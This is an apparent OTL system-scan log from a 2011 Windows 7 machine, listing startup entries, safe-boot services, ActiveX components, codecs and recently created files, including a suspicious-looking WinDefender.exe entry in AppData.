MsConfig:64bit - StartUpReg: FlashPlayerUpdate - hkey= - key= -  File not found
MsConfig:64bit - StartUpReg: IAAnotif - hkey= - key= - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe (Intel Corporation)
MsConfig:64bit - StartUpReg: iTunesHelper - hkey= - key= - C:\Program Files (x86)\iTunes\iTunesHelper.exe (Apple Inc.)
MsConfig:64bit - StartUpReg: PLFSetI - hkey= - key= - C:\Windows\PLFSetI.exe ()
MsConfig:64bit - StartUpReg: RtHDVCpl - hkey= - key= - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
MsConfig:64bit - StartUpReg: StartCCC - hkey= - key= - C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe (Advanced Micro Devices, Inc.)
MsConfig:64bit - StartUpReg: VitaKeyPdtWzd - hkey= - key= - c:\Program Files (x86)\Acer Bio Protection\PdtWzd.exe (Egis Technology Inc.)
MsConfig:64bit - StartUpReg: Windows Defender - hkey= - key= -  File not found
MsConfig:64bit - StartUpReg: Windows Mobile Device Center - hkey= - key= - C:\Windows\WindowsMobile\wmdc.exe (Microsoft Corporation)
MsConfig:64bit - State: "bootini" - Reg Error: Key error.
 
SafeBootMin:64bit: AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SafeBootMin:64bit: Base - Driver Group
SafeBootMin:64bit: Boot Bus Extender - Driver Group
SafeBootMin:64bit: Boot file system - Driver Group
SafeBootMin:64bit: File system - Driver Group
SafeBootMin:64bit: Filter - Driver Group
SafeBootMin:64bit: HelpSvc - Service
SafeBootMin:64bit: mcmscsvc - Service
SafeBootMin:64bit: MCODS - Service
SafeBootMin:64bit: PCI Configuration - Driver Group
SafeBootMin:64bit: PNP Filter - Driver Group
SafeBootMin:64bit: Primary disk - Driver Group
SafeBootMin:64bit: sacsvr - Service
SafeBootMin:64bit: SCSI Class - Driver Group
SafeBootMin:64bit: System Bus Extender - Driver Group
SafeBootMin:64bit: vmms - Service
SafeBootMin:64bit: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin:64bit: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin:64bit: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin:64bit: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin:64bit: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin:64bit: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin:64bit: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin:64bit: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin:64bit: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin:64bit: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin:64bit: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin:64bit: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin:64bit: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootMin:64bit: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin:64bit: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootMin:64bit: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootMin:64bit: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: HelpSvc - Service
SafeBootMin: mcmscsvc - Service
SafeBootMin: MCODS - Service
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: sacsvr - Service
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vmms - Service
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
 
SafeBootNet:64bit: AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SafeBootNet:64bit: Base - Driver Group
SafeBootNet:64bit: Boot Bus Extender - Driver Group
SafeBootNet:64bit: Boot file system - Driver Group
SafeBootNet:64bit: File system - Driver Group
SafeBootNet:64bit: Filter - Driver Group
SafeBootNet:64bit: HelpSvc - Service
SafeBootNet:64bit: mcmscsvc - Service
SafeBootNet:64bit: MCODS - Service
SafeBootNet:64bit: Messenger - Service
SafeBootNet:64bit: MpfService - Service
SafeBootNet:64bit: NDIS Wrapper - Driver Group
SafeBootNet:64bit: NetBIOSGroup - Driver Group
SafeBootNet:64bit: NetDDEGroup - Driver Group
SafeBootNet:64bit: Network - Driver Group
SafeBootNet:64bit: NetworkProvider - Driver Group
SafeBootNet:64bit: PCI Configuration - Driver Group
SafeBootNet:64bit: PNP Filter - Driver Group
SafeBootNet:64bit: PNP_TDI - Driver Group
SafeBootNet:64bit: Primary disk - Driver Group
SafeBootNet:64bit: rdsessmgr - Service
SafeBootNet:64bit: sacsvr - Service
SafeBootNet:64bit: SCSI Class - Driver Group
SafeBootNet:64bit: Streams Drivers - Driver Group
SafeBootNet:64bit: System Bus Extender - Driver Group
SafeBootNet:64bit: TDI - Driver Group
SafeBootNet:64bit: vmms - Service
SafeBootNet:64bit: WudfUsbccidDriver - Driver
SafeBootNet:64bit: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet:64bit: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet:64bit: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet:64bit: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet:64bit: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet:64bit: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet:64bit: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet:64bit: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet:64bit: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet:64bit: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet:64bit: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet:64bit: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet:64bit: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet:64bit: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet:64bit: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet:64bit: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers
SafeBootNet:64bit: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootNet:64bit: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootNet:64bit: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet:64bit: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootNet:64bit: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootNet:64bit: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: HelpSvc - Service
SafeBootNet: mcmscsvc - Service
SafeBootNet: MCODS - Service
SafeBootNet: Messenger - Service
SafeBootNet: MpfService - Service
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: rdsessmgr - Service
SafeBootNet: sacsvr - Service
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vmms - Service
SafeBootNet: WudfUsbccidDriver - Driver
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers
SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
 
ActiveX:64bit: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX:64bit: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:64bit: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX:64bit: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:64bit: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX:64bit: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:64bit: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:64bit: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:64bit: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:64bit: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:64bit: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:64bit: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:64bit: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:64bit: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX:64bit: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -BaseSettings
ActiveX:64bit: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX:64bit: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:64bit: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX:64bit: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:64bit: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:64bit: {F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4} - .NET Framework
ActiveX:64bit: {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:64bit: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX:64bit: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\System32\ie4uinit.exe -UserIconConfig
ActiveX:64bit: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Microsoft VM
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45243DF8-4329-6B8C-EB73-1E9A410F98F8} - Microsoft Windows Media Player
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\SysWOW64\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {B6C3CD7F-FEFE-DE0E-2FEE-AFBFED2ECC4D} - C:\Users\..\AppData\Roaming\WinDefender.exe
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - Adobe Flash Player
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: {F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4} - .NET Framework
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP
 
Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.vorbis - C:\Windows\SysWow64\vorbis.acm (HMS hxxp://hp.vector.co.jp/authors/VA012897/)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: vidc.DIVX - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
Drivers32: vidc.VP60 - C:\Windows\SysWOW64\vp6vfw.dll (On2.com)
Drivers32: vidc.VP61 - C:\Windows\SysWOW64\vp6vfw.dll (On2.com)
Drivers32: vidc.yv12 - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2011.09.05 23:47:03 | 000,000,000 | ---D | C] -- C:\Users\..\DoctorWeb
[2011.09.05 16:33:27 | 000,000,000 | ---D | C] -- C:\Users\..\AppData\Roaming\Malwarebytes
[2011.09.05 16:32:58 | 000,041,272 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysWow64\drivers\mbamswissarmy.sys
[2011.09.05 16:32:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2011.09.05 16:32:57 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2011.09.05 16:32:53 | 000,025,912 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2011.09.05 16:32:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2011.08.26 02:19:45 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\I2Phex
[2011.08.26 02:19:35 | 000,000,000 | ---D | C] -- C:\Program Files\I2Phex
[2011.08.26 01:44:08 | 000,000,000 | ---D | C] -- C:\Users\..\Documents\Vuze Downloads
[2011.08.26 01:36:37 | 000,000,000 | ---D | C] -- C:\Users\..\AppData\Roaming\Azureus
[2011.08.26 00:12:03 | 000,000,000 | ---D | C] -- C:\Users\..\AppData\Roaming\I2P
[2011.08.26 00:10:42 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\I2P
[2011.08.26 00:10:42 | 000,000,000 | ---D | C] -- C:\Program Files\i2p
[2011.08.20 22:19:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox
[2011.08.20 02:23:17 | 000,000,000 | ---D | C] -- C:\Users\..\EurekaLog
[2011.08.18 05:39:45 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KORG
[2010.06.06 15:19:25 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe35B0.dll
 
========== Files - Modified Within 30 Days ==========
 
[2011.09.06 00:06:27 | 000,022,752 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2011.09.06 00:06:27 | 000,022,752 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2011.09.05 23:31:53 | 000,007,624 | ---- | M] () -- C:\Users\..\AppData\Local\resmon.resmoncfg
[2011.09.05 22:08:24 | 000,659,804 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat
[2011.09.05 22:08:24 | 000,619,704 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2011.09.05 22:08:24 | 000,108,024 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2011.09.05 22:08:23 | 001,507,406 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2011.09.05 22:08:23 | 000,131,904 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat
[2011.09.05 22:04:41 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2011.09.05 12:54:06 | 000,000,225 | ---- | M] () -- C:\Windows\ODBC.INI
[2011.09.05 12:49:08 | 000,000,947 | ---- | M] () -- C:\Windows\CDPlayer.ini
[2011.09.05 12:14:27 | 000,516,856 | ---- | M] () -- C:\Windows\SysNative\oodbs.lor
[2011.09.05 01:10:13 | 000,000,281 | ---- | M] () -- C:\Users\..\AppData\Roaming\Current.prx
[2011.08.31 15:02:45 | 000,437,299 | R--- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2011.08.26 16:01:16 | 000,006,778 | RHS- | M] () -- C:\ProgramData\ntuser.pol
[2011.08.16 14:42:16 | 000,000,600 | ---- | M] () -- C:\Users\..\AppData\Roaming\winscp.rnd
 
========== Files Created - No Company Name ==========
 
[2011.05.16 17:43:17 | 000,001,636 | ---- | C] () -- C:\Windows\Sandboxie.ini
[2011.04.01 17:46:10 | 000,000,281 | ---- | C] () -- C:\Users\..\AppData\Roaming\Current.prx
[2011.02.23 22:22:05 | 000,000,193 | ---- | C] () -- C:\Windows\WORDPAD.INI
[2011.02.13 02:36:56 | 000,000,600 | ---- | C] () -- C:\Users\..\AppData\Local\PUTTY.RND
[2011.01.28 02:21:13 | 000,210,032 | ---- | C] () -- C:\Windows\SysWow64\DBCLIENT.DLL
[2011.01.26 16:13:17 | 000,000,032 | ---- | C] () -- C:\Windows\CD_Start.INI
[2010.11.19 17:10:49 | 000,376,832 | ---- | C] () -- C:\Windows\SysWow64\AegisI5Installer.exe
[2010.10.23 16:46:43 | 000,451,072 | ---- | C] () -- C:\Windows\SysWow64\ISSRemoveSP.exe
[2010.10.06 17:21:25 | 000,000,267 | ---- | C] () -- C:\Windows\wininit.ini
[2010.09.17 21:17:00 | 000,002,888 | ---- | C] () -- C:\Windows\SysWow64\atipblag.dat
[2010.08.30 21:01:31 | 000,000,027 | ---- | C] () -- C:\Windows\EZSET_SP.INI
[2010.08.25 18:39:45 | 000,000,947 | ---- | C] () -- C:\Windows\CDPlayer.ini
[2010.08.24 20:48:27 | 000,006,778 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2010.08.09 13:20:20 | 001,456,640 | ---- | C] () -- C:\Program Files (x86)\Common Files\Falk Navi-Manager.msi
[2010.06.25 19:03:12 | 000,053,299 | ---- | C] () -- C:\Windows\SysWow64\pthreadVC.dll
[2010.06.22 18:39:07 | 000,017,212 | ---- | C] () -- C:\Users\..\AppData\Roaming\UserTile.png
[2010.06.10 19:31:15 | 000,000,600 | ---- | C] () -- C:\Users\..\AppData\Roaming\winscp.rnd
[2010.06.10 19:31:09 | 000,007,624 | ---- | C] () -- C:\Users\..\AppData\Local\resmon.resmoncfg
[2010.06.10 19:31:09 | 000,000,017 | ---- | C] () -- C:\Users\..\AppData\Local\resmon.resmoncfg~QF7TBR69
[2010.06.05 22:50:59 | 000,000,225 | ---- | C] () -- C:\Windows\ODBC.INI
[2010.06.05 18:35:56 | 000,000,000 | ---- | C] () -- C:\Windows\nsreg.dat
[2010.06.05 06:42:28 | 000,001,716 | ---- | C] () -- C:\Windows\WPatchProgress.ini
[2010.06.04 22:05:11 | 001,539,212 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2010.06.04 21:46:16 | 000,626,688 | ---- | C] () -- C:\Windows\Image.dll
[2010.06.04 21:46:16 | 000,200,704 | ---- | C] () -- C:\Windows\PLFSetI.exe
[2010.06.04 21:46:16 | 000,020,480 | ---- | C] () -- C:\Windows\USB_VIDEO_REG.exe
[2010.06.04 21:46:16 | 000,000,323 | ---- | C] () -- C:\Windows\PidList.ini
[2010.06.04 21:28:16 | 000,000,000 | ---- | C] () -- C:\Windows\ativpsrm.bin
[2009.08.22 12:16:40 | 000,872,448 | ---- | C] () -- C:\Windows\iconv.dll
[2009.08.22 12:16:40 | 000,743,424 | ---- | C] () -- C:\Windows\libxml2.dll
[2009.08.22 12:16:37 | 000,000,189 | ---- | C] () -- C:\Windows\Prelaunch.ini
[2009.08.22 12:16:37 | 000,000,166 | ---- | C] () -- C:\Windows\WisLangCode.ini
[2009.08.22 12:16:37 | 000,000,147 | ---- | C] () -- C:\Windows\WisPriority.ini
[2009.07.14 07:38:36 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat
[2009.07.14 04:35:51 | 000,000,741 | ---- | C] () -- C:\Windows\SysWow64\NOISE.DAT
[2009.07.14 04:34:42 | 000,215,943 | ---- | C] () -- C:\Windows\SysWow64\dssec.dat
[2009.07.14 02:10:29 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin
[2009.07.14 01:42:10 | 000,064,000 | ---- | C] () -- C:\Windows\SysWow64\BWContextHandler.dll
[2009.07.13 23:59:36 | 000,982,196 | ---- | C] () -- C:\Windows\SysWow64\igkrng500.bin
[2009.07.13 23:59:36 | 000,139,824 | ---- | C] () -- C:\Windows\SysWow64\igfcg500.bin
[2009.07.13 23:59:36 | 000,097,448 | ---- | C] () -- C:\Windows\SysWow64\igfcg500m.bin
[2009.07.13 23:59:35 | 000,417,344 | ---- | C] () -- C:\Windows\SysWow64\igcompkrng500.bin
[2009.07.13 23:03:59 | 000,364,544 | ---- | C] () -- C:\Windows\SysWow64\msjetoledb40.dll
[2009.06.10 23:26:10 | 000,673,088 | ---- | C] () -- C:\Windows\SysWow64\mlang.dat
 
========== LOP Check ==========
 
[2010.10.06 18:01:56 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\182666AD-6432-4E25-AA4A-6EF9816ECDB3
[2011.07.03 12:57:28 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\3D64BBAF-5217-468D-ABFE-420DF5FE15DC
[2010.11.26 10:10:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\5C686C02-B900-402D-A8E4-9B52CE7738CB
[2011.07.05 00:24:28 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\838593B1-C9CF-4405-A557-1C094C97D4B6
[2010.10.18 16:44:10 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Acronis
[2010.06.10 19:31:16 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\AVG9
[2011.08.26 15:55:40 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Azureus
[2011.07.02 18:42:35 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\DAEMON Tools Lite
[2011.04.09 19:25:06 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\EvaBox
[2010.10.06 16:55:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Hardcore
[2011.08.26 02:00:23 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\I2P
[2011.03.23 17:49:46 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\ICQ
[2010.10.06 16:55:34 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\JavaEditor
[2010.10.06 16:55:22 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Juce VST Host
[2011.09.05 15:50:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\KeePass
[2011.01.24 00:24:30 | 000,000,000 | ---D | M] -- C:\Users\..\AppData\Roaming\Miranda
